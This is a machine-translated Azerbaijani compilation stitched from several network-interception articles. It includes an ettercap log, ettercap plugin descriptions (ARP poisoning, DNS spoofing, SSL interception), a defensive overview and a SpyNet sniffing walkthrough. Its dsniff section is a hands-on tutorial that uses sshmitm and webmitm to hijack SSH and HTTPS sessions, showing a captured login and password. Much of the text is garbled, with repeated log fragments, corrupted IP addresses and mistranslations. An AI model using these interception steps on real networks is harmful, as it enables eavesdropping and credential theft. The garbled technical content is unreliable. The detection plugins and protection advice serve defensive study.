Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // mial üçün parol: ettercap 0.8.2 müəllif hüququ 2001-2015 Ettercap İnkişaf Qrupu Dinləyir: eth0 -> 08:00:27:A3:08:4A 192.36/. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL disseksiyası etter.conf faylında etibarlı "redir_command_on" skriptinə ehtiyac duyur. İmtiyazlar EUID 65534 EGID 65534-ə endirildi... satıcı barmaq izi 1766 tcp ƏS barmaq izi 2182 məlum xidmətlər skan etmək üçün 255 hostun təsadüfiləşdirilməsi... 255 host üçün bütün şəbəkə maskasının skan edilməsi... * |===== =============== ==============================>| 100.00 % Host siyahısına 3 host əlavə edildi... Vahid iylənməyə start verilir... Yalnız mətn interfeysi aktivləşdirilib... Daxili yardım üçün "h" düyməsini basın arp_cop plaginini aktivləşdirir... arp_cop: plugin işləyir... arp_cop: (yeni host ) 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.35 iddia edir (arp_cop.192.168.1.18W.) 5 iddia edir ki, 192.168.1.1 arp_cop: ( XƏBƏRDARLIQ ) 192.168.1.35 özünü 192.168.1.1 arp_cop kimi göstərir: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 1912.168.1.1.arp_cop. _cop: (WA RNING) 192.168.1.35 iddia edir 192.168 .1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 arp_cop kimi göstərir: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.35 olduğunu iddia edir (arp_cop. 5 özünü 192.1 68.1.1 arp_cop kimi göstərir: ( XƏBƏRDARLIQ) 192.168 .1.35 özünü 192.168.1.1 arp_cop kimi göstərir: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 1912.168.1.1.arp_cop. _cop: (XƏBƏRDARLIQ) 192.1 68.1.35 iddia edir 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 kimi göstərir arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.35 192.168.1.35 (XƏBƏRDARLIQ) özünü 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 arp_cop kimi göstərir: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 1912.168.1.1. arp_cop. _cop: (XƏBƏRDARLIQ) 192.168.1.3 5 iddia edir 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 kimi göstərir arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.35 olduğunu iddia edir (arp_cop.192.168.1.18.) 5 özünü 192.168.1.1 arp_cop kimi göstərir : ( XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 arp_cop kimi göstərir: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.1. arp_cop. polis: (XƏBƏRDARLIQ) 192.168.1.35 kimi davranır 192. 168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 kimi göstərir arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 arp_cop: (WAR2.16.1.1.5) kimi göstərir. 19 2.168.1.1 arp_cop: (XƏBƏRDARLIQ ) 192.168.1.35 özünü 192.168.1.1 arp_cop kimi göstərir: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.1.cop.arp.cop. (XƏBƏRDARLIQ ) 192.168.1.35 özünü 192.168. . 1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 192.168.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168.1.1 arp_cop: WARN12.16-a qədər göstərir: 92.16 8.1.1 arp_cop: (XƏBƏRDARLIQ) 192.168. 1.35 özünü 192.168.1.1 kimi göstərir arp_cop: (XƏBƏRDARLIQ) 192.168.1.35 özünü 192.168.1.1 kimi göstərir arp_cop: (XƏBƏRDARLIQ) 192.168.1.1.cop. XƏBƏRDARLIQ) 192.16 8.1.35 özünü 192.168. .1.1............................

7.2 avtomatik əlavə edin

ARP zəhərlənmə mitm hücumuna qoşulduqca o, avtomatik olaraq yeni qurbanlar əlavə edəcək. O, yerli şəbəkədə ARP sorğularını axtarır və aşkar edilərsə, siyahı HƏDƏF kimi göstərilibsə, plagin hostu qurbanlar siyahısına əlavə edəcək. Host ondan arp sorğusu görünəndə əlavə edilir.

7.3 chk_zəhər

Ettercap-da arp etch modullarının uğurlu olub olmadığını yoxlayır. O, özünü hər qurban kimi göstərərək, bütün yem qurbanlarına saxta ICMP əks-səda paketləri göndərir. O, təyinat olaraq MAC ünvanımızla ICMP cavabını tuta bilər ki, bu da iki hədəf arasında fırlanmanın uğurlu olması deməkdir. Hər bir əlaqənin hər iki yolunu yoxlayır.

7.4 dns_spoof

Bu plagin DNS sorğularını kəsir və saxta (saxta) cavabla cavab verir. Siz etter.dns faylını redaktə etməklə plaqinin hansı ünvana cavab verməsini seçə bilərsiniz. Plugin A, AAAA, PTR, MX, WINS, SRV və TXT sorğularına müdaxilə edir. Əgər bu A sorğusu idisə, o zaman ad faylda axtarılır və IP ünvanı qaytarılır (adda joker işarələrdən istifadə edə bilərsiniz).

Eyni şey AAAA sorğularına da aiddir.

7.5 find_conn

Ev sahibinin ünsiyyət qurmaq istədiyi bütün hədəfləri göstərmək üçün ARP sorğularını dinləyən çox sadə plagin. O, həmçinin naməlum LAN-larda ünvanları tapmağa kömək edə bilər.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

LAN-a göndərilən ettercap paketlərini müəyyən etməyə çalışır. Bu, ettercap istifadə etməyə çalışan birinin müəyyən edilməsində faydalı ola bilər. Testlər yalnız müəyyən ardıcıllıqlar/ID nömrələri üzərində işlədiyi üçün ona 100% etibar etməyin.

7.7 Skan_zəhərləyicisi

Siyahıdakı ev sahiblərindən hər hansı biri ilə bizim aramızda kimlərinsə yem olub-olmadığını yoxlayacağıq. Əvvəlcə siyahıdakı iki hostun eyni olub olmadığını yoxlayır mac ünvanı. Bu o demək ola bilər ki, onlardan biri özünü digəri kimi göstərərək bizi zəhərləyir. Proksi-arp mühitində çoxlu yanlış pozitivlər yarada bilər. Bu yoxlamanı yerinə yetirmək üçün hostların siyahısını yaratmalısınız. Bundan sonra o, siyahıdakı hər hosta icmp əks-səda paketləri göndərir və cavab mənbəyinin mac ünvanının həmin IP ilə siyahıda saxladığımız ünvandan fərqli olub-olmadığını yoxlayır. Bu o demək ola bilər ki, kimsə bizim IP ünvanımıza sahib kimi davranaraq və ələ keçirilən paketləri bizə yönləndirməklə bu hostu aldadır. Siz bu aktiv testi qeyri-hücum rejimində işlədə bilməzsiniz.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Kiminsə əxlaqsız rejimdə burnunu çəkdiyini (dinlədiyini) tapmağa çalışır. O, host siyahısındakı hər bir hədəfə iki fərqli zəif formalaşmış arp sorğusu göndərir və cavabları gözləyir. Cavab hədəf hostdan gəldisə, az və ya çox ehtimal ki, hədəfdə şəbəkə kartı azğınlıq rejimindədir. Yanlış həyəcan siqnalları yarada bilər. Siz onu əmr satırından və ya plaginlər menyusundan işə sala bilərsiniz. Arp cavablarını dinlədiyi üçün arp sorğuları göndərərkən onlardan istifadə etməsəniz daha yaxşı olar.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Azğın rejimdə iki şəbəkə kartını uğurla təxmin etmək nümunəsi:

Genişləndirin

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 müəllif hüququ 2001-2015 Ettercap İnkişaf Qrupu Dinləyir: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/2525:05:a.a. 27ff:feaf:30b9/64 SSL disseksiyası etter.conf faylında etibarlı "redir_command_on" skriptinə ehtiyac duyur Ettercap düzgün işləməyə bilər. /proc/sys/net/ipv6/conf/eth0/use_tempaddr 0-a təyin edilməyib. İmtiyazlar EUID 65534 EGID 65534-ə endirildi... 33 plaginlər 42 protokol dissektoru 57 port monitorinq edilən 20388 mac satıcısı barmaq izi xidmətləri 1716 məlum barmaq izi xidmətləri LuOS2 : heç bir skript göstərilməyib, işə başlamır! Skan üçün 255 hostun təsadüfiləşdirilməsi... 255 host üçün bütün şəbəkə maskası skan edilir... * |============================= ============= ======================>| 100.00% Host siyahısına 5 host əlavə edildi... Vahid iylənməyə start verilir... Yalnız mətn interfeysi aktivləşdirildi... Daxili yardım üçün "h" düyməsini basın search_promisc plaginini aktivləşdirin... search_promisc: Promisc NIC-lər axtarılır... NIC-lər daha az iylənir : - 192.168.1.36 - 192.168.1.34 Çox güman ki, NIC-ləri iyləyir: - YOXDUR Mətn interfeysi bağlanır... Ettercap dayandırılır... Lua təmizlənməsi tamamlandı! Vahid iyləmə dayandırıldı.

7.9 sslstrip

SSL mitm hücumu zamanı ettercap real SSL sertifikatını öz sertifikatı ilə əvəz edir. Saxta sertifikat tez yaradılır və bütün sahələr server tərəfindən təqdim olunan həqiqi sertifikata uyğun doldurulur.

(62%)

(56.5%)

(təsadüfi - 0,2%)

Bu yazıda Man-in-the-Middle kimi hücumlara, daha doğrusu üsula baxacağıq
Man in Middle hücumundan istifadə edərək SSH və HTTP trafikinin yönləndirilməsi. Pişiyi quyruğundan çəkməyək, amma işə başlayaq.

Ortadakı adam (qısaca MitM, rus dilindən sadəcə olaraq - "vasitəçinin hücumu" və ya "adam
ortada") məlumatı tutmaq üçün iki maşın arasında trafikin yönləndirilməsinə əsaslanan hücum növüdür - onu əlavə öyrənmək, məhv etmək və ya dəyişdirmək. Beləliklə, bizə lazım olan ilk şey dsniff paketidir (paketə keçidi burada görəcəksiniz. Məqalənin sonu).Niyə Bəli, çünki bu paket aşağıdakı təhlükəsizlik sxemindən yan keçə bilən sshmitm (SSH trafikinin yönləndirilməsi) və httpmitm (HTTP trafikinin yönləndirilməsi) daxil olmaqla bütün zəruri kommunalları ehtiva edir: bildiyiniz qədər, protokollar məlumatların şifrələnməsi kifayət qədərdir -onlar "təhlükəsizdir" (şifrələmə kömək edir :)) və hücumların şəbəkə qatının "üst hissəsində" həyata keçirilməsinə imkan vermir.Şifrələmə açarı hakerə məlum deyil - verilənlərin şifrəsini açmaq mümkün deyil. və həmçinin əmr daxil edin.Hər şey yaxşı görünür, amma necə
dsniff paketindən MitM hücum proqramları (sshmitm və httpmitm) yan keçə bildiyi üçün bu sistem təhlükəsizlik (demək olar ki, hər şeyi keçə bilərsiniz). Bütün bunlar aşağıdakı prinsipə uyğun olaraq həyata keçirilir:
aralıq host müştəridən sorğu qəbul edir, ona server olduğunu “deyir”, sonra isə real serverə qoşulur.
Bizə lazım olan ikinci şey düz qollar, dördüncü şey - ən vacib şey - arzu və əlbəttə ki, qurban, yəni hücum edəcəyimiz kompüterdir.

SSH trafikinin yönləndirilməsi

Alətləri hazırladıqdan sonra nəyin nə olduğunu və niyə olduğunu başa düşdün :). Sshmitm alın - indi biz SSH trafikini yönləndirəcəyik (nəzəri hissə ilə başa düşmədiyiniz hər şey - yuxarıda oxuyun)
ondan istifadə edərək, bugünkü PKI-nin çatışmazlıqlarından istifadə edərək (ictimai açar infrastrukturu - əsas idarəetmə sxemi
asimmetrik kriptoqrafiya üsulları). Gəlin sintaksisə baxaq
sshmitm:

sshmitm [-d] [-I] [-p port] host

D
debug çıxışına icazə verin (yəni daha təkmil rejim)

I
sessiyanın qaçırılması

P portu
dinləmə portu

ev sahibi
seanslarına müdaxilə ediləcək uzaq hostun ünvanı

liman
uzaq hostdakı port

Hər şey sadə və zövqlü görünür - mürəkkəb bir şey yoxdur :). Gəlin hücumu həyata keçirməyə başlayaq!

# sshmitm server.target.gov // SSH serverinizi təyin edin
sshmitm: server.target.gov serverinə ötürülmə

Həqiqi bir SSH açarımız olmadığı üçün hücuma məruz qalanın əmr tərcüməçisi
host açarını yoxlamaq üçün sorğu göstərəcək, hamısı belə görünəcək:

clientmachine$ server.target.gov
@XƏBƏRDARLIQ: UZAQ SAHİBİN İDDİAFİKASI DƏYİŞİB! @
OLA BİLƏRDİR ki, KİMSİNİN BİRİSƏNƏ BİR ŞEY ETMƏSİ!
İndi kimsə sizi dinləyə bilər (ortadakı adam hücumu)!
RSA host açarının yenicə dəyişdirilməsi də mümkündür.
Sistem administratorunuzla əlaqə saxlayın.

Və sonra istifadəçi qoşulub-qoşulmayacağına qərar verəcək. Əgər belədirsə, onda biz SSH sessiyasına tam nəzarət edəcəyik.
AMMA! Əgər istifadəçi heç vaxt həmin avtomobilə qoşulmayıbsa, aşağıdakı mesaj görünə bilər:

"server.target.gov" hostunun həqiqiliyi müəyyən edilə bilməz
RSA açarı barmaq izidir
bla:bla:bla;bla;bla.......
Qoşulmağa davam etmək istədiyinizə əminsiniz (bəli/xeyr)?

Burada istifadəçinin də iki seçimi var - qoşulmaq və ya etməmək. Əgər belədirsə, sessiyaya müdaxilə etdik, yoxsa, heyf... :(.
Ümumiyyətlə, istifadəçi qoşulduqda hücum uğurlu oldu və sshmitm də öz növbəsində bütün keçidləri və girişləri qeyd etdi və çox oxunaqlı bir şəkildə :)
Təbii ki, bu, yeganə SSH sessiyasının qarşısını alan deyil, lakin bununla tanış olduqdan sonra digərini asanlıqla mənimsəyə bilərsiniz :)

HTTP trafikinin yönləndirilməsi

İndi HTTP trafikini yönləndirəcəyik. Yenə də bizə əvvəl seçilmiş alət lazım olacaq: 80 (HTTP -) və 443 (HTTPS -) portlarını dinləyən, WEB sorğularını kəsən, sonra serverə qoşulan və sorğuları müştəri kompüterinə yönləndirən httpmitm. Proqram həmçinin OpenSSL istifadə edərək SSL açarları və SSL sertifikatları yaradır. Sonra cəhd etdikdən sonra
sayta (target.gov) qoşulur, brauzer SSL sertifikatını yoxlayacaq. Sertifikatlar uyğun gəlmədiyi üçün istifadəçinin brauzeri xəbərdarlıq edəcək
səhv SSL sertifikatı. Təcavüzkarın nöqteyi-nəzərindən bu, belə görünəcək:

#webmitm -d
webmitm: şəffaf ötürülməsi
webmitm: yeni əlaqə
GET [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[versiya]
Əlaqə: [növ]
Ev sahibi: www.target.gov
İstifadəçi-Agent: [sistem, brauzer məlumatı]
[və s, və s., və s.]
Kuki: [kukilər]

Kənardan hər şey belə görünür -
SSL bağlantısı ələ keçirilir, şifrələnməmiş məlumatları tutur.

Nəticə

Bu yazıda biz Man in the Middle hücumundan istifadə edərək SSH və HTTP trafikinin yönləndirilməsinə baxdıq - aydın, ətraflı, qısaca. Digər HTTP və SSH yönləndiriciləri
Bunları da mənimsəmiş olsanız, MitM-dən istifadə edərək trafiki tez mənimsəyəcəksiniz :)). Bir şey aydın deyilsə, onda ...

Şəbəkə üzərindən məlumatların tutulması uzaq kompüter cihazından hər hansı bir məlumatın alınmasıdır. O, istifadəçinin şəxsi məlumatlarından, onun mesajlarından və vebsayt ziyarətlərinin qeydlərindən ibarət ola bilər. Məlumatların tutulması casus proqramlar və ya şəbəkə snayferləri vasitəsilə həyata keçirilə bilər.

Spyware xüsusi bir iş stansiyasından və ya cihazdan şəbəkə üzərindən ötürülən bütün məlumatları qeyd edə bilən xüsusi proqramdır.

Sniffer şəbəkədən keçən trafiki kəsən və təhlil edən proqram və ya kompüter texnologiyasıdır. Sniffer veb-sessiyaya qoşulmağa və kompüter sahibinin adından müxtəlif əməliyyatlar yerinə yetirməyə imkan verir.

Məlumat real vaxt rejimində ötürülmürsə, casus proqram məlumatı görmək və təhlil etmək üçün rahat olan hesabatlar yaratmaq.

Şəbəkənin ələ keçirilməsi qanuni və ya qeyri-qanuni yolla həyata keçirilə bilər. Məlumat əldə etməyin qanuniliyini müəyyən edən əsas sənəd Kibercinayətkarlıq haqqında Konvensiyadır. 2001-ci ildə Macarıstanda yaradılmışdır. Qanuni tələblər ştatdan ştata bir qədər dəyişə bilər, lakin əsas mesaj bütün ölkələr üçün eynidir.

Şəbəkə üzərindən məlumatların ələ keçirilməsinin təsnifatı və üsulları

Yuxarıda göstərilənlərə uyğun olaraq, şəbəkə üzərindən məlumatların tutulması iki növə bölünə bilər: səlahiyyətli və icazəsiz.

Səlahiyyətli məlumatların ələ keçirilməsi korporativ məlumatların qorunmasından milli təhlükəsizliyin təmin edilməsinə qədər müxtəlif məqsədlər üçün həyata keçirilir. Belə əməliyyatın aparılması üçün əsaslar qanunvericilik, xüsusi xidmət orqanları, hüquq-mühafizə orqanlarının vəzifəli şəxsləri və mütəxəssisləri tərəfindən müəyyən edilir. inzibati təşkilatlar və şirkətin təhlükəsizlik xidmətləri.

Məlumatların ələ keçirilməsi üçün beynəlxalq standartlar mövcuddur. Avropa Telekommunikasiya Standartları İnstitutu məlumatın ələ keçirilməsinin əsaslandığı bir sıra texniki prosesləri (ETSI ES 201 158 “Telekommunikasiya təhlükəsizliyi; Qanuni Müdaxilə (LI); Şəbəkə funksiyaları üçün tələblər”) uyğunlaşdırmağa nail olmuşdur. Nəticədə məxfi xidmət mütəxəssislərinə və şəbəkə administratorlarına şəbəkədən qanuni şəkildə məlumat əldə etməyə kömək edən sistem arxitekturası hazırlanmışdır. Şəbəkə üzərində məlumatların tutulmasını həyata keçirmək üçün hazırlanmış struktur simli və üçün istifadə olunur simsiz sistemlər səsli zənglər, həmçinin poçtla yazışmalar, IP üzərindən səsli mesajların ötürülməsi, SMS vasitəsilə məlumat mübadiləsi.

Şəbəkə üzərindən məlumatların icazəsiz tutulması məxfi məlumatları, parolları, korporativ sirləri, şəbəkədəki kompüter maşınlarının ünvanlarını və s. ələ keçirmək istəyən təcavüzkarlar tərəfindən həyata keçirilir. Məqsədlərinə çatmaq üçün hakerlər adətən şəbəkə trafiki analizatorundan - snifferdən istifadə edirlər. Bu proqram və ya aparat-proqram cihazı fırıldaqçıya sertifikat saxtakarlığı vasitəsilə şifrələnmiş SSL trafiki də daxil olmaqla qurban istifadəçinin qoşulduğu şəbəkə daxilində məlumatı tutmaq və təhlil etmək imkanı verir. Trafik məlumatları müxtəlif yollarla əldə edilə bilər:

şəbəkə interfeysinə qulaq asmaq,
ələ keçirmə cihazını kanal fasiləsinə qoşmaq,
trafik bölməsi yaratmaq və onu snayperə təkrarlamaq,
hücumu həyata keçirməklə.

Şəbəkə qarşılıqlı əlaqəsinə müdaxilə etməyə və məlumatları dəyişdirməyə imkan verən vacib məlumatların tutulması üçün daha mürəkkəb texnologiyalar da mövcuddur. Belə üsullardan biri saxta ARP sorğularıdır. Metodun mahiyyəti qurbanın kompüteri ilə təcavüzkarın cihazı arasında IP ünvanlarının dəyişdirilməsidir. Şəbəkə üzərindən məlumatların tutulması üçün istifadə edilə bilən başqa bir üsul yanlış marşrutlaşdırmadır. Bu, şəbəkə marşrutlaşdırıcısının IP ünvanını öz ünvanınızla əvəz etməyi nəzərdə tutur. Əgər kibercinayətkar qurbanın yerləşdiyi yerli şəbəkənin necə təşkil olunduğunu bilirsə, o zaman istifadəçinin maşınından onun IP ünvanına məlumatın qəbulunu asanlıqla təşkil edə bilər. TCP bağlantısını çəkmək də xidmət edir effektiv şəkildə məlumatların tutulması. Təcavüzkar TCP paketlərini yaradaraq qurbanın kompüterinə göndərməklə ünsiyyət seansını kəsir. Sonra kommunikasiya seansı müştəri əvəzinə cinayətkar tərəfindən bərpa olunur, ələ keçirilir və davam etdirilir.

Təsir obyekti

Şəbəkə üzərindən məlumatların tutulmasının obyektləri dövlət qurumları, sənaye müəssisələri, kommersiya strukturları və adi istifadəçilər ola bilər. Təşkilat və ya biznes şirkəti daxilində məlumat şəbəkə infrastrukturunu qorumaq üçün ələ keçirilə bilər. Kəşfiyyat orqanları və hüquq-mühafizə orqanları qarşıya qoyulan vəzifədən asılı olaraq müxtəlif sahiblərdən ötürülən məlumatların kütləvi şəkildə ələ keçirilməsini həyata keçirə bilərlər.

Əgər kibercinayətkarlardan danışırıqsa, o zaman istənilən istifadəçi və ya təşkilat şəbəkə üzərindən ötürülən məlumatları əldə etmək üçün təsir obyektinə çevrilə bilər. Səlahiyyətli giriş ilə, alınan məlumatın informativ hissəsi vacibdir, təcavüzkar isə ələ keçirmək üçün istifadə edilə bilən məlumatlarla daha çox maraqlanır. Nəğd olaraq və ya onun sonrakı satışı üçün dəyərli məlumat.

Çox vaxt ictimai şəbəkəyə qoşulan istifadəçilər, məsələn, qaynar nöqtəsi olan kafedə kibercinayətkarlar tərəfindən informasiyanın ələ keçirilməsinin qurbanı olurlar. Wi-Fi girişi. Təcavüzkar snayferdən istifadə edərək veb-sessiyaya qoşulur, məlumatları əvəz edir və şəxsi məlumatları oğurlayır. Bunun necə baş verdiyini məqalədə oxuyun.

Təhdid mənbəyi

Şirkət və təşkilatlarda məlumatların icazəli ələ keçirilməsi ictimai şəbəkə infrastrukturu operatorları tərəfindən həyata keçirilir. Onların fəaliyyəti şəxsi məlumatların, kommersiya sirlərinin və s. qorunmasına yönəlib mühim informasiya. Qanuni olaraq, vətəndaşların və dövlətin təhlükəsizliyini təmin etmək üçün mesajların və faylların ötürülməsinə xüsusi xidmət orqanları, hüquq-mühafizə orqanları və müxtəlif dövlət qurumları tərəfindən nəzarət edilə bilər.

Cinayətkarlar qeyri-qanuni məlumatların ələ keçirilməsi ilə məşğul olurlar. Kibercinayətkarın qurbanına çevrilməmək üçün mütəxəssislərin bəzi tövsiyələrinə əməl etməlisiniz. Məsələn, ictimai şəbəkələrə qoşulma olan yerlərdə avtorizasiya və həssas məlumatların ötürülməsini tələb edən əməliyyatları yerinə yetirməməlisiniz. Şifrələmə ilə şəbəkələri seçmək daha təhlükəsizdir və daha yaxşıdır - şəxsi 3G və LTE modemlərindən istifadə etmək. Şəxsi məlumatları ötürərkən, HTTPS protokolundan və ya şəxsi VPN tunelindən istifadə edərək şifrələmək tövsiyə olunur.

Siz kriptoqrafiya və anti-sniffers istifadə edərək, kompüterinizi şəbəkə trafikinin tutulmasından qoruya bilərsiniz; Simsiz şəbəkəyə daxil olmaq əvəzinə dial-up riskləri azaldacaq.

Bu dərs şəbəkə paketlərinin ələ keçirilməsinə əsaslanan şəbəkə sındırma texnologiyalarını təsvir edir. Hakerlər qiymətli məlumatları oğurlamaq üçün şəbəkə trafikinə qulaq asmaq, ortada adam hücumu məqsədilə məlumatların ələ keçirilməsini təşkil etmək, TCP əlaqələrini ələ keçirmək, məsələn, məlumatların saxtalaşdırılmasına imkan vermək üçün bu cür texnologiyalardan istifadə edirlər. , heç də az maraqlı olmayan hərəkətlər. Təəssüf ki, bu hücumların əksəriyyəti əslində yalnız Unix şəbəkələri üçün həyata keçirilir, bunun üçün hakerlər hər ikisini istifadə edə bilər. xüsusi kommunal xidmətlər, və Unix sistem alətləri. Görünür, Windows şəbəkələri hakerlər tərəfindən məhəl qoyulmayıb və biz şəbəkə paketlərinin mənasız dinləmələri üçün nəzərdə tutulmuş proqramları iyləmək üçün məlumatların tutulması vasitələrinin təsvirini məhdudlaşdırmağa məcburuq. Bununla belə, xüsusilə anti-hakerlər üçün bu cür hücumların ən azı nəzəri təsvirini laqeyd etməmək lazımdır, çünki istifadə olunan haker texnologiyaları haqqında bilik bir çox bəlaların qarşısını almağa kömək edəcəkdir.

Şəbəkə iylənməsi

Adətən Ethernet şəbəkələrini iyləmək üçün istifadə olunur. şəbəkə kartları dinləmə rejiminə keçdi. Dinləyirəm Ethernet şəbəkələri sniffer proqramı ilə işləyən kompüterin şəbəkə seqmentinə qoşulmasını tələb edir, bundan sonra bu şəbəkə seqmentindəki kompüterlər tərəfindən göndərilən və qəbul edilən bütün şəbəkə trafiki haker üçün əlçatan olur. Simsiz şəbəkə vasitəçilərindən istifadə edən radio şəbəkələrindən trafikin qarşısını almaq daha asandır - bu halda kabelə qoşulmaq üçün yer axtarmağa belə ehtiyac yoxdur. Və ya təcavüzkar bunun üçün əlverişli yer taparaq kompüteri İnternet serverinə birləşdirən telefon xəttinə qoşula bilər (telefon xətləri ümumiyyətlə zirzəmilərdə və digər nadir hallarda ziyarət edilən yerlərdə heç bir qorunmadan çəkilir).

Koklama texnologiyasını nümayiş etdirmək üçün biz bir çox internet saytlarında tapıla bilən çox məşhur SpyNet sniffer proqramından istifadə edəcəyik. SpyNet proqramının rəsmi internet saytı http://members.xoom.com/layrentiu2/ ünvanında yerləşir, burada proqramın demo versiyasını yükləyə bilərsiniz.

SpyNet proqramı iki komponentdən ibarətdir - CaptureNet və PipeNet. CaptureNet proqramı Ethernet şəbəkəsi üzərindən ötürülən paketləri şəbəkə səviyyəsində tutmağa imkan verir, yəni. Ethernet çərçivələri şəklində. PipeNet proqramı Ethernet çərçivələrini tətbiq səviyyəsi paketlərinə yığmağa, məsələn, mesajları bərpa etməyə imkan verir. E-poçt, HTTP protokol mesajları (Veb server ilə məlumat mübadiləsi) və digər funksiyaları yerinə yetirir.

Təəssüf ki, SpyNet demosunda PipeNet-in imkanları HTTP paket montaj nümayişi ilə məhdudlaşır, ona görə də biz SpyNet-i tam şəkildə nümayiş etdirə bilməyəcəyik. Bununla belə, eksperimental şəbəkəmizdən nümunə olaraq istifadə edərək SpyNet-in şəbəkə iyləmə imkanlarını nümayiş etdirəcəyik. mətn faylı Sword-2000 hostundan adi istifadə edərək Alex-Z hostuna Windows Explorer. Eyni zamanda, A1ex-1 kompüterində ötürülən paketləri tutacaq və Ethernet çərçivələrində ötürülən faylın məzmununu oxumağa imkan verən CaptureNet proqramını işə salacağıq. Şəkildə. 1 secret.txt faylında gizli mesajın mətnini göstərir; bu mətni çəkilmiş Ethernet çərçivələrində tapmağa çalışacağıq.

düyü. 1. Notepad pəncərəsində gizli mesajın mətni

Ethernet çərçivələrini çəkmək üçün bu addımları yerinə yetirin:

Alex-Z kompüterində CaptureNet proqramını işə salın. Proqramın göstərilən iş pəncərəsində menyu əmrini seçin Capture * Start (Capture * Start) və şəbəkə çərçivələrinin tutulması prosesinə başlayın.

Windows Explorer istifadə edərək, security.txt faylını Sword-2000 kompüterindən A1ex-3-ə köçürün.

secret.txt faylını köçürdükdən sonra Capture * Stop menyu əmrini seçin və çəkmə prosesini dayandırın.

Tutulan Ethernet çərçivələri CaptureNet proqram pəncərəsinin sağ tərəfində görünəcək (Şəkil 2), yuxarıdakı siyahıda hər bir sıra Ethernet çərçivəsini, siyahının altında isə seçilmiş çərçivənin məzmununu əks etdirir.

düyü. 2. Ethernet çərçivəsi gizli mesaj mətnini ehtiva edir

Tutulan çərçivələrin siyahısına nəzər salaraq, biz ötürdüyümüz mətni ehtiva edəni asanlıqla tapa bilərik. Bu, çox böyük sirrdir (Bu, çox böyük sirrdir).

Bu, bütün tutulan şəbəkə trafikinin qeydə alındığı ən sadə nümunə olduğunu vurğulayırıq. CaptureNet sizə xüsusi protokollar və xüsusi host portlarına göndərilən paketləri tutmağa, xüsusi məzmunlu mesajları seçməyə və ələ keçirilən məlumatları faylda toplamağa imkan verir. Bu cür hərəkətlərin yerinə yetirilməsi texnikası sadədir və onu SpyNet proqramının yardım sistemindən istifadə etməklə öyrənmək olar.

Primitiv şəbəkə dinləmələri ilə yanaşı, hakerlər məlumatların ələ keçirilməsi üçün daha mürəkkəb vasitələrə çıxış əldə edirlər. Aşağıda nəzəri aspektdən olsa belə, bu cür metodların qısa icmalı verilmişdir. Səbəb odur ki, Windows şəbəkələri üçün məlumatların tutulması hücumlarının praktiki həyata keçirilməsi son dərəcə məhduddur və ələ keçirmə hücumları üçün etibarlı utilitlər dəsti kifayət qədər zəifdir.

Şəbəkə trafikinin qarşısının alınması üsulları

Yuxarıdakı CaptureNet kimi şəbəkə analizator proqramlarından istifadə edərək şəbəkə iylənməsi məlumatların tutulmasının ilk, ən sadə yoludur. SpyNet-ə əlavə olaraq, şəbəkə fəaliyyətinin təhlili, şəbəkələrin diaqnostikası, müəyyən edilmiş meyarlara uyğun olaraq trafikin seçilməsi və digər şəbəkə idarəetmə vəzifələri üçün ilkin olaraq işlənib hazırlanmış bir çox alətlər şəbəkə iylənməsi üçün istifadə olunur. Belə proqrama misal tcpdump (http://www.tcpdump.org) ola bilər ki, bu da şəbəkə trafikini sonrakı təhlil üçün xüsusi jurnalda qeyd etməyə imkan verir.

Şəbəkənin dinləməsindən qorunmaq üçün xüsusi proqramlar, məsələn, şəbəkə trafikini dinləyən şəbəkədəki kompüterləri müəyyən etməyə qadir olan AntiSniff (http://www.securitysoftwaretech.com/antisniff) istifadə olunur. Onların problemlərini həll etmək üçün antisniffer proqramları şəbəkədə dinləmə qurğularının mövcudluğunun xüsusi işarəsindən istifadə edir - snayfer kompüterinin şəbəkə kartı xüsusi dinləmə rejimində olmalıdır. Dinləmə rejimində olarkən, şəbəkə kompüterləri sınaqdan keçirilən hosta göndərilən IP dataqramlarına xüsusi şəkildə reaksiya verir. Məsələn, dinləyən hostlar adətən hostun ünvanına göndərilən dataqramları deyil, bütün daxil olan trafiki emal edir. AntiSniff-in tanıya biləcəyi şübhəli host davranışını göstərən digər əlamətlər də var.

Yanlış ARP sorğuları

